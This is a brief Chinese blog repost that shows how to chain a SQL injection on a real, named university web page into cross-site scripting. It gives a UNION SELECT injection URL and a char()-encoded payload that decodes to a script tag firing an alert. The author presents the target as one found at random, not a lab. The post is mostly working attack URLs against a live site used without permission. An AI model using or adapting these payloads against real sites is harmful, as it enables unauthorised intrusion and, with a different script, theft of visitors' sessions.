利用的SQL注入来玩玩跨站XSS

　2009-06-12 16:55:04　来源：WEB开发网　　　

核心提示：secure-hiphop的Blog 先将自己要弹出的东西编码一下随便找的注入点例如 www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2-- 我们就在1的位置填入转码后的代码可爱的弹跳窗就出来了 www.lob.polytechnique.fr/t

secure-hiphop的Blog

先将自己要弹出的东西编码一下

利用的SQL注入来玩玩跨站XSS

随便找的注入点例如

www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2--

我们就在1的位置填入转码后的代码

可爱的弹跳窗就出来了

www.lob.polytechnique.fr/themes.php?id=1-1+union+select+char(34, 62, 60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 51, 51, 55, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),2--